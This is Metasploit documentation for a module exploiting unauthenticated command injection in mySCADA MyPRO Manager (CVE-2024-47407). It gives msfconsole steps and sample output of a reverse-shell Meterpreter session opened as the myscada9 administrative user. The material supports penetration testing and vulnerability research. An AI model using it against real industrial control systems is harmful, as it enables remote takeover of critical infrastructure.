documentation/modules/exploit/windows/scada/mypro_mgr_cmd.md
Vulnerability Description
This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).
An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
myscada9, an administrative user that is automatically added by the product during installation.
Versions <= 1.2 are affected. CISA published ICSA-24-326-07 to cover the security issues. The official changelog from the vendor for the updated version is available here.
Vulnerable Application Installation
A trial version of the software can be obtained from the vendor.
Successfully tested on
msfconsole and run the following commands:msf > use exploit/windows/scada/mypro_mgr_cmd
msf exploit(windows/scada/mypro_mgr_cmd) > set RHOSTS <IP>
msf exploit(windows/scada/mypro_mgr_cmd) > exploit
You should get a meterpreter session in the context of myscada9.
Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the following:
msf exploit(windows/scada/mypro_mgr_cmd) > exploit
[*] Started reverse TCP handler on 192.168.1.227:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 192.168.1.228
[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500
[*] Exploit finished, check thy shell.
meterpreter > getuid
Server username: asdf\myscada9
meterpreter > sysinfo
Computer : asdf
OS : Windows 11 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows